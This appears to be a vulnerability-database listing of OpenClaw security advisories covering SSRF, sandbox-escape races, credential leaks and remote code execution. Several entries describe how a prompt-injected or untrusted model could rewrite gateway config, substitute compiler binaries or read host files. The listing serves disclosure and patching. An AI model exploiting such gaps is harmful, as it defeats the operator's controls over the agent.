OpenClaw: Browser CDP profile creation skipped strict-mode SSRF checks ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `< 2026.4.20` - Patched version: `2026.4.20` ## Impact Browser profile creation normalized `cdpUrl` values before persisting them, but did not apply the configured browser SSRF policy at creation time. In deployments that explicitly disabled private-network CDP targets, a stored profile could still point at a private-network or metadata endpoint and later be probed by normal profile status flows. Default trusted-operator browser behavior allows private-network CDP endpoints, so this only affected strict-mode deployments. Severity is low. ## Fix OpenClaw now checks CDP endpoints against the browser SSRF policy during profile creation and reachability operations. Fix commits: - `1fd049e3074cac72f6734a7fe88468c84f5f8bd7` - `e90c89cf8b1459f2aa1f3a665be67392b6c03fdf` ## Release Fixed in OpenClaw `2026.4.20`. |
Affected by 12 other vulnerabilities. |
|
VCID-w2rd-2j4p-gfgw
Aliases: CVE-2026-34504 GHSA-qxgf-hmcj-3xw3 |
OpenClaw affected by SSRF via unguarded image download in fal provider ## Summary The fal provider used raw fetches for both provider API traffic and returned image download URLs instead of the existing SSRF-guarded fetch path. ## Impact A malicious or compromised fal relay could make the gateway fetch internal URLs and expose metadata or internal service responses through the image pipeline. ## Affected Component `extensions/fal/image-generation-provider.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `80d1e8a11a` (`fal: guard image fetches`). OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 150 other vulnerabilities. |
|
VCID-w2tj-nqa6-cuam
Aliases: GHSA-qmwg-qprg-3j38 |
OpenClaw: Browser interaction routes could pivot into local CDP and regain file reads ## Summary Browser interaction routes could pivot into local CDP and regain file reads. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.9` - Patched versions: `>= 2026.4.9` ## Impact Browser act/evaluate interactions could trigger navigation into the local CDP origin and then create or read disallowed `file://` pages despite direct navigation guards. ## Technical Details The fix re-checks browser URLs after interaction-driven navigations and blocks targets that violate the configured navigation policy. ## Fix The issue was fixed in #63226. The first stable tag containing the fix is `v2026.4.9`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `5f5b3d733bdd791cb457f838514179e1288b10b3` - PR: #63226 ## Release Process Note Users should upgrade to `openclaw` 2026.4.9 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @tdjackey for reporting this issue. |
Affected by 59 other vulnerabilities. |
|
VCID-w4p1-sxdg-hyha
Aliases: CVE-2026-42424 GHSA-qqq7-4hxc-x63c |
OpenClaw: Shared reply MEDIA - paths are treated as trusted and can trigger cross-channel local file exfiltration ## Impact Shared reply MEDIA: paths are treated as trusted and can trigger cross-channel local file exfiltration. A crafted shared reply MEDIA reference could cause another channel to read a local file path as trusted generated media. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<=2026.4.4` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @threalwinky for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-w58d-6veg-uugy
Aliases: CVE-2026-41339 GHSA-2f7j-rp58-mr42 |
OpenClaw: Gateway hello snapshots exposed host config and state paths to non-admin clients ## Summary Before OpenClaw 2026.4.2, the Gateway `connect` success snapshot exposed local `configPath` and `stateDir` metadata to non-admin clients. Low-privilege authenticated clients could learn host filesystem layout and deployment details that were not needed for their role. ## Impact A non-admin client could recover host-specific filesystem paths and related deployment metadata, aiding host fingerprinting and chained attacks. This was an information-disclosure issue, not a direct authorization bypass. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `676b748056b5efca6f1255708e9dd9469edf5e2e` — limit connect snapshot metadata to admin-scoped clients ## Release Process Note The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live. Thanks @topsec-bunney for reporting. |
Affected by 80 other vulnerabilities. |
|
VCID-watb-49vx-yub1
Aliases: CVE-2026-41403 GHSA-3xv9-89fm-7h4r |
OpenClaw: diffs viewer misclassifies proxied remote requests as loopback when `allowRemoteViewer` is disabled ## Summary diffs viewer misclassifies proxied remote requests as loopback when `allowRemoteViewer` is disabled ## Current Maintainer Triage - Status: open - Normalized severity: low - Assessment: Shipped v2026.3.28 misclassified proxied diff-viewer requests as local loopback in some cases, a real but low-severity access-control flaw. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `30a1690323088fd291abd11643a264a6828a002c` — 2026-03-30T14:17:27-06:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @smaeljaish771 for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-wkye-je9r-1fba
Aliases: CVE-2026-41342 GHSA-3cw3-5vxw-g2h3 |
OpenClaw: CLI Remote Onboarding Persists Unauthenticated Discovery Endpoint and Exfiltrates Gateway Credentials ## Summary Remote onboarding accepted discovered gateway endpoints without an explicit trust confirmation before persisting the remote URL and connection details. ## Impact A malicious or spoofed discovery endpoint could steer onboarding toward an attacker-controlled gateway and capture future gateway credentials or traffic. ## Affected Component `src/commands/onboard-remote.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `d6affb17d8` (`CLI: confirm discovered remote gateways before saving config`). |
Affected by 150 other vulnerabilities. |
|
VCID-wmr3-83u3-6qdb
Aliases: CVE-2026-40037 GHSA-qx8j-g322-qj6m |
OpenClaw: `fetchWithSsrFGuard` replays unsafe request bodies across cross-origin redirects ## Impact `fetchWithSsrFGuard` replays unsafe request bodies across cross-origin redirects. A guarded fetch could resend unsafe request bodies or headers when following cross-origin redirects. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<2026.3.31` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @BG0ECV for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-wx44-n3fr-skah
Aliases: CVE-2026-41301 GHSA-h43v-27wg-5mf9 |
OpenClaw: Forged Nostr DMs could create pairing state before signature verification ## Summary Before OpenClaw 2026.3.31, the Nostr DM ingress path could issue pairing challenges before validating the event signature. A forged DM could create a pending pairing entry and trigger a pairing-reply attempt before signature rejection. ## Impact An unauthenticated remote sender could consume shared pairing capacity and trigger bounded relay/logging work on the Nostr channel. This issue did not grant message decryption, pairing approval, or broader authorization bypass. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `>= 2026.3.22, < 2026.3.31` - Patched versions: `>= 2026.3.31` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `4ee742174f36b5445703e3b1ef2fbd6ae6700fa4` — verify inbound DM signatures before pairing replies ## Release Process Note The fix shipped in OpenClaw `2026.3.31` on March 31, 2026. The current published npm release `2026.4.1` from April 1, 2026 also contains the fix. Thanks @smaeljaish771 for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-wyce-qxau-mqff
Aliases: CVE-2026-43576 GHSA-f7fh-qg34-x2xh |
OpenClaw: CDP /json/version WebSocket URL could pivot to untrusted second-hop targets ## Summary CDP /json/version WebSocket URL could pivot to untrusted second-hop targets. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.5` - Patched versions: `>= 2026.4.5` ## Impact A browser profile could trust a CDP `/json/version` response whose `webSocketDebuggerUrl` pointed at a different host, enabling a second-hop SSRF-style pivot. ## Technical Details The fix normalizes and re-validates direct CDP WebSocket targets before connecting. ## Fix The issue was fixed in #60469. The first stable tag containing the fix is `v2026.4.5`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `bc356cc8c2beaa747c71dd86cceab8f804699665` - PR: #60469 ## Release Process Note Users should upgrade to `openclaw` 2026.4.5 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @tdjackey for reporting this issue. |
Affected by 81 other vulnerabilities. |
|
VCID-x2ru-ydpv-f3ah
Aliases: CVE-2026-43529 GHSA-gj9q-8w99-mp8j |
OpenClaw: TOCTOU read in exec script preflight ## Summary OpenClaw's exec script preflight validator previously validated and then read a script by mutable pathname. A local race could swap the path between validation and read, causing preflight analysis to inspect a different file identity than the one that passed the workspace boundary check. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact The impact is limited. This was not arbitrary full-file disclosure through the preflight error path. The validator only surfaced derived preflight content, such as a matched token, a line number, or the first non-empty JavaScript line in one branch. Exploitation also required the ability to mutate the relevant workspace path during the preflight window. Still, this was a real TOCTOU boundary bug in code that is supposed to reason about workspace-local script files before execution. A file identity that passed the initial boundary validation could differ from the identity that was later read for preflight analysis. ## Technical Details The vulnerable flow performed separate path validation and file reads in `validateScriptFileForShellBleed`. Because the read was path-based, an attacker with write access to the workspace path could race replacement of the target after validation but before preflight read. ## Fix PR #62333 replaced the check-then-read flow with a pinned safe-open/read path using the shared `readFileWithinRoot` helper. The fixed path performs boundary verification around the opened file identity and avoids relying on a mutable pathname for the final preflight read. Regression tests cover both pre-open and post-open swap windows. ## Fix Commit(s) - `b024fae9e5df43e9b69b2daebb72be3469d52e91` (`fix(exec): replace TOCTOU check-then-read with atomic pinned-fd open in script preflight [AI]`) - PR: #62333 ## Release Process Note The fix first shipped in `v2026.4.10`. Users should upgrade to `openclaw` `2026.4.10` or newer; the latest npm release already includes the fix. ## Credits Thanks to @kikayli for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-x4hn-ygbg-mkep
Aliases: CVE-2026-41333 GHSA-6p8r-6m93-557f |
OpenClaw: Fake DeviceToken Bypasses Shared Auth Rate Limiting ## Summary Fake DeviceToken Bypasses Shared Auth Rate Limiting ## Current Maintainer Triage - Status: narrow - Normalized severity: low - Assessment: Real in shipped mixed WS auth flow, but practical risk is mostly weak shared-password deployments since strong shared tokens remain non-bruteforceable. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `af0c0862f22ca4492406a3103d05e3628f94cbe9` — 2026-03-31T09:08:57+09:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. OpenClaw thanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-x794-wfnf-1ugf
Aliases: GHSA-57gh-m6rq-54cf |
OpenClaw: Self-Whitelisting in appendLocalMediaParentRoots Allows Arbitrary File Read & Credential Exfiltration ## Summary Media Local Roots Self-Whitelisting in `appendLocalMediaParentRoots` Allows Model-Initiated Arbitrary Host File Read and Credential Exfiltration ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: v2026.3.28 still self-whitelists media parent dirs in src/media/local-roots.ts, but only after config already permits tool-fs root expansion, so the impact is narrower than the default-critical framing. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `1ca4261d7e055d0be141ed79ebb1365d0fbc7364` — 2026-03-30T17:15:03+01:00 OpenClaw thanks @tdjackey for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-x7uw-s9a6-fybd
Aliases: GHSA-fwjq-xwfj-gv75 |
OpenClaw: `session_status` still bypasses configured `tools.sessions.visibility` for unsandboxed invocations ## Summary `session_status` still bypasses configured `tools.sessions.visibility` for unsandboxed invocations ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: Real on shipped v2026.3.22: non-sandboxed session_status skipped the shared visibility guard, but this is a same-agent session-policy bypass with unreleased fix, not a broader host-boundary break. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `4d369a3400dc9b737fbe8daa63f09d909ce7beb8` — 2026-03-30T16:48:12+02:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @tdjackey for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-xfgw-ua7r-abbr
Aliases: CVE-2026-41372 GHSA-fh32-73r9-rgh5 |
OpenClaw: Trailing-dot localhost CDP hosts could bypass remote loopback protections ## Summary Before OpenClaw 2026.4.2, remote CDP discovery could return a trailing-dot localhost host such as `localhost.` and bypass OpenClaw's loopback-host normalization. That let a non-loopback remote CDP profile pivot the follow-up connection back onto localhost. ## Impact A hostile discovery response could retarget authenticated browser control toward a localhost-resolving endpoint on the OpenClaw host. This weakened the existing remote-CDP loopback protection and could expose localhost-backed browser state. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `9c22d636697336a6b22b0ae24798d8b8325d7828` — normalize localhost absolute-form CDP hosts before loopback checks ## Release Process Note The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live. Thanks @smaeljaish771 for reporting. |
Affected by 80 other vulnerabilities. |
|
VCID-xj73-kszs-yygp
Aliases: CVE-2026-44997 GHSA-q3jj-46pq-826r |
OpenClaw's ACP child sessions inherit subagent security envelope constraints ## Summary ACP child sessions inherit subagent security envelope constraints. ## Affected Packages / Versions - Package: openclaw (npm) - Affected versions: <= 2026.4.21 - Fixed version: 2026.4.22 ## Impact A restricted subagent spawning an ACP child session could fail to carry forward subagent-only constraints such as depth, child-count limits, control scope, or target-agent restrictions. ## Fix ACP spawn now resolves and persists child subagent envelope fields, enforces maximum depth and active-child caps, and applies the inherited control scope to child ACP sessions. ## Fix Commit(s) - 31160dc069b7cc5d833b39c53736a41ad3befda2 ## Verification - The fix commit is contained in the public v2026.4.22 tag. - openclaw@2026.4.22 is published on npm and the compiled package contains the fix. - Focused regression coverage for this path passed before publication. OpenClaw thanks @zsxsoft, @qclawer, and @KeenSecurityLab for reporting. |
Affected by 3 other vulnerabilities. |
|
VCID-xnvm-rp36-vyaj
Aliases: CVE-2026-41913 GHSA-25wv-8phj-8p7r |
OpenClaw: Concurrent async auth attempts can bypass the intended shared-secret rate-limit budget on Tailscale-capable paths ## Impact Concurrent async auth attempts can bypass the intended shared-secret rate-limit budget on Tailscale-capable paths. Concurrent asynchronous shared-secret auth attempts could race the per-key rate-limit budget. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<=2026.4.2` - Patched versions: `2026.4.4` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @Telecaster2147 for reporting. |
Affected by 0 other vulnerabilities. Affected by 81 other vulnerabilities. |
|
VCID-xpr3-hg3h-z3bz
Aliases: CVE-2026-35629 GHSA-rhfg-j8jq-7v2h |
OpenClaw: SSRF via Unguarded Configured Base URLs in Multiple Channel Extensions (Incomplete Fix for CVE-2026-28476) ## Summary SSRF via Unguarded Configured Base URLs in Multiple Channel Extensions (Incomplete Fix for CVE-2026-28476) ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details Several channel extensions still used raw `fetch()` against configured base URLs without the SSRF guard that was added for CVE-2026-28476. Commit `f92c92515bd439a71bd03eb1bc969c1964f17acf` routes those outbound requests through `fetchWithSsrFGuard` so configured endpoints cannot be rebound to blocked internal destinations. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `f92c92515bd439a71bd03eb1bc969c1964f17acf`. ## Fix Commit(s) - `f92c92515bd439a71bd03eb1bc969c1964f17acf` |
Affected by 150 other vulnerabilities. |
|
VCID-xryt-a83q-q7et
Aliases: CVE-2026-41406 GHSA-877v-w3f5-3pcq |
OpenClaw: Feishu thread history and quoted messages bypass sender allowlist ## Summary Feishu thread history and quoted messages bypass sender allowlist ## Current Maintainer Triage - Status: open - Normalized severity: medium - Assessment: Real in shipped v2026.3.28 Feishu because fetched quoted/root/thread context bypasses sender allowlists, and SECURITY.md does not exempt remote sender-allowlist bypasses. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `f45e5a6569aab1d58cc6de25b19f1dc4c8779b85` — 2026-03-31T19:43:54+09:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-xsct-xjs7-nbab
Aliases: CVE-2026-44109 GHSA-xh72-v6v9-mwhc |
OpenClaw: Feishu webhook and card-action validation now fail closed ## Summary Feishu webhook mode accepted missing `encryptKey` configuration as valid and blank card-action callback tokens as usable lifecycle tokens. Together, those fail-open paths could allow unauthenticated webhook or card-action traffic to reach command dispatch in affected deployments. ## Impact A deployment using Feishu webhook mode without a configured `encryptKey`, or handling malformed card-action callbacks with blank callback tokens, could fail open instead of rejecting the request. Severity remains critical because affected webhook deployments expose a network-triggered path into OpenClaw command handling without the expected Feishu signature or replay protection. ## Affected versions - Affected: `< 2026.4.15` - Patched: `2026.4.15` ## Fix OpenClaw `2026.4.15` makes Feishu webhook and card-action validation fail closed. Webhook mode now refuses to start without an `encryptKey`, missing signing configuration returns invalid instead of valid, invalid signatures return `401`, and blank card-action callback tokens are rejected before dispatch. Verified in `v2026.4.15`: - `extensions/feishu/src/monitor.transport.ts` returns invalid when `encryptKey` is missing, refuses webhook mode without `encryptKey`, and rejects invalid signatures before JSON handling. - `extensions/feishu/src/card-action.ts` rejects blank callback tokens in the card-action lifecycle guard. - `extensions/feishu/src/monitor.webhook-security.test.ts` covers missing-`encryptKey` startup and transport rejection. - `extensions/feishu/src/monitor.card-action.lifecycle.test.ts` covers malformed blank-token card actions being dropped before handler dispatch. Fix commit included in `v2026.4.15` and absent from `v2026.4.14`: - `c8003f1b33ed2924be5f62131bd28742c5a41aae` via PR #66707 Thanks to @dhyabi2 for reporting this issue. |
Affected by 24 other vulnerabilities. |
|
VCID-xvhd-w4tv-tqhr
Aliases: CVE-2026-41296 GHSA-9p3r-hh9g-5cmg |
OpenClaw: Sandbox escape via TOCTOU race in remote FS bridge readFile ## Summary Sandbox escape via TOCTOU race in remote FS bridge readFile ## Current Maintainer Triage - Normalized severity: critical - Assessment: v2026.3.28 remote sandbox reads still do path-check then separate file read, so the TOCTOU sandbox escape remains present in the latest shipped tag. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `121870a08583033ed6a0ed73d9ffea32991252bb` — 2026-03-31T09:55:51+09:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-xz8s-hj5s-wfgj
Aliases: GHSA-68v4-hmwv-f43h |
OpenClaw: Media download follows cross-origin redirects with Authorization headers intact ## Summary Media download follows cross-origin redirects with Authorization headers intact ## Current Maintainer Triage - Status: open - Normalized severity: medium - Assessment: Shipped v2026.3.28 media downloads forwarded Authorization across cross-origin redirects, a real in-scope credential-leak class that fits medium. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `e704323ff388ed21f6963f9b8e0b1b8dfaaabc5f` — 2026-03-31T19:57:42+09:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-xzg5-ren5-p7gw
Aliases: CVE-2026-41352 GHSA-xj9w-5r6q-x6v4 |
OpenClaw: Device-Paired Node Skips Node Scope Gate → Host RCE.md ## Summary Device-Paired Node Skips Node Scope Gate → Host RCE.md ## Current Maintainer Triage - Status: open - Normalized severity: high - Assessment: Real in shipped v2026.3.28 because a merely device-paired node could expose node commands without node pairing, but high is sufficient given the pairing/setup prerequisites. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `3886b65ef21d02808c1a106fa1f9f69e22f71c32` — 2026-03-30T17:29:28+01:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-y65g-4baa-a7c2
Aliases: CVE-2026-45002 GHSA-2xcp-x87w-q377 |
OpenClaw: Hook mapping templates could bypass hook session-key opt-in ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `< 2026.4.20` - Patched version: `2026.4.20` ## Impact Templated hook mapping `sessionKey` values were treated differently from request-supplied session keys. A hook mapping could render an externally influenced session key even when `hooks.allowRequestSessionKey` was disabled, bypassing the intended routing opt-in for hook callers. This affects webhook routing isolation. It does not grant host execution by itself. Severity is medium. ## Fix Template-rendered mapping session keys are now treated as externally supplied routing input and require `hooks.allowRequestSessionKey=true` plus the existing prefix policy checks. Fix commit: - `5275d008ed33203dba3f98e969ad683a65c416c3` ## Release Fixed in OpenClaw `2026.4.20`. |
Affected by 12 other vulnerabilities. |
|
VCID-y7sd-j9xn-qffs
Aliases: CVE-2026-34425 GHSA-fvx6-pj3r-5q4q |
OpenClaw's complex interpreter pipelines could skip exec script preflight validation ## Summary Before OpenClaw 2026.4.2, exec script preflight validation could fail open on complex interpreter invocations such as pipes or other non-simple command forms. In those cases, script-content validation could be skipped entirely. ## Impact An attacker-controlled command shape could bypass the intended preflight validation for script execution. This weakened a defense-in-depth guard that was meant to block unsafe script content before execution. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513` — close the fail-open bypass in exec script preflight ## Release Process Note The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live. Thanks @iskindar for reporting, and thanks @wsparks-vc for coordination. |
Affected by 80 other vulnerabilities. |
|
VCID-ye4t-n6r3-67ab
Aliases: GHSA-cwj3-vqpp-pmxr |
OpenClaw's gateway config mutation guard allowed unsafe model-driven config writes ## Summary The agent-facing `gateway` tool protects `config.apply` and `config.patch` with a model-to-operator trust boundary. That guard used a hand-maintained denylist of protected config paths. The config schema outgrew that denylist, leaving sensitive subtrees writable through model-driven gateway config mutations. ## Impact A prompt-injected or otherwise compromised model running with access to the owner-only `gateway` tool could persist unsafe config changes that crossed security boundaries. Examples included config paths affecting command execution, network/proxy/TLS behavior, credential forwarding, telemetry or hook endpoints, memory/indexing surfaces, and operator policy controls. These changes could survive restart once written to config. ## Affected Packages / Versions - Package: `openclaw` on npm - Affected: versions before `2026.4.23` - Fixed: `2026.4.23` - Latest stable verified fixed: `openclaw@2026.4.23`, tag `v2026.4.23` ## Fix OpenClaw replaced the denylist with a fail-closed allowlist. Agent-driven `gateway config.apply` and `gateway config.patch` now permit only narrow agent-tunable prompt/model settings and mention-gating paths. Other config changes are rejected before the gateway mutation RPC is invoked. ## Fix Commit(s) - `bceda6089aa7b3695cc7696b43c61ae3d01bb0ec` (`fix(gateway): fail closed on runtime config edits`) ## Severity Severity remains `high`. The vulnerable entry point is owner-only, but the model/agent is not a trusted principal under OpenClaw's security model, and the guard is the explicit model-to-operator boundary for persisted config mutation. |
Affected by 0 other vulnerabilities. |
|
VCID-yhpq-5qy3-y7bn
Aliases: CVE-2026-44114 GHSA-hxvm-xjvf-93f3 |
OpenClaw: Workspace dotenv could override runtime-control environment variables ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `< 2026.4.20` - Patched version: `2026.4.20` ## Impact Workspace `.env` loading did not reserve the `OPENCLAW_` runtime-control namespace broadly enough. A malicious workspace could set variables such as `OPENCLAW_GIT_DIR` before source-update or installer flows, potentially steering trusted OpenClaw runtime behavior. This requires running OpenClaw from an attacker-controlled workspace. Severity is medium. ## Fix OpenClaw now reserves the workspace `OPENCLAW_` environment namespace and rejects workspace dotenv entries for OpenClaw runtime-control variables. Fix commit: - `018494fa3ebb9145112e68b56fe1cb2e9f9a9ed6` ## Release Fixed in OpenClaw `2026.4.20`. |
Affected by 12 other vulnerabilities. |
|
VCID-ykwt-tdpa-3bft
Aliases: CVE-2026-41302 GHSA-9q7v-8mr7-g23p |
OpenClaw: SSRF via Unguarded `fetch()` in Marketplace Plugin Download and Ollama Model Discovery ## Summary SSRF via Unguarded `fetch()` in Marketplace Plugin Download and Ollama Model Discovery ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: Keep the shipped marketplace archive-fetch SSRF, but narrow out the Ollama half because it is operator-configured and overlaps weaker trust-model or duplicate SSRF ground. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `8deb9522f3d2680820588b190adb4a2a52f3670b` — 2026-03-30T20:08:38+01:00 OpenClaw thanks @tdjackey for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-ymmv-2qmq-6kap
Aliases: CVE-2026-44113 GHSA-5h3g-6xhh-rg6p |
OpenClaw: OpenShell FS bridge reads pin and verify the opened file before returning bytes ## Summary OpenShell FS bridge reads pin and verify the opened file before returning bytes ## Affected Packages / Versions - Package: openclaw (npm) - Affected versions: <= 2026.4.21 - Fixed version: 2026.4.22 ## Impact A time-of-check/time-of-use race around OpenShell sandbox filesystem reads could let a symlink swap cause bytes outside the intended mount root to be read. ## Fix OpenShell reads now open the file with no-follow semantics where available, validate the pinned file descriptor against the canonical mount root, reject unsafe hardlink/symlink cases, and use a strict fallback ancestor walk on platforms without fd-path readback. ## Fix Commit(s) - 95119017c847c737bd113f0bff728c4666d79c45 ## Verification - The fix commit is contained in the public v2026.4.22 tag. - openclaw@2026.4.22 is published on npm and the compiled package contains the fix. - Focused regression coverage for this path passed before publication. Thanks @VladimirEliTokarev for reporting. |
Affected by 3 other vulnerabilities. |
|
VCID-ynup-4v9e-tbh4
Aliases: CVE-2026-41373 GHSA-g8xp-qx39-9jq9 |
OpenClaw: Incomplete host-env-security-policy allows untrusted model to substitute compiler binaries via env overrides ## Summary Incomplete `host-env-security-policy.json` allows untrusted model to substitute compiler binaries (`CC`, `CXX`, `CARGO_BUILD_RUSTC`, `CMAKE_C_COMPILER`) via env overrides on approved host exec requests ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: Shipped v2026.3.28 host-env policy missed compiler override vars, but exploitation still requires an approved host-exec request inside the existing exec trust domain, so medium not high. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `e277a37f896b5011a1df06e6490c6630074d0afa` — 2026-03-30T20:06:32+01:00 OpenClaw thanks @tdjackey for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-yp2w-pc58-9bf6
Aliases: CVE-2026-41378 GHSA-gjm7-hw8f-73rq |
OpenClaw: Paired node escalates to gateway RCE via unrestricted node.event agent dispatch ## Summary Paired node escalates to gateway RCE via unrestricted node.event agent dispatch ## Current Maintainer Triage - Status: narrow - Normalized severity: high - Assessment: v2026.3.28 still lets paired role=node clients drive node.event agent.request into broader gateway-side tool access than node RPCs, but critical is overstated because a trusted paired node foothold is already required. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `a77928b1087e90f2a8903f8e5aca6dec9237ac62` — 2026-03-30T14:22:15+01:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-ywrn-52gx-f3ad
Aliases: CVE-2026-41356 GHSA-rfqg-qgf8-xr9x |
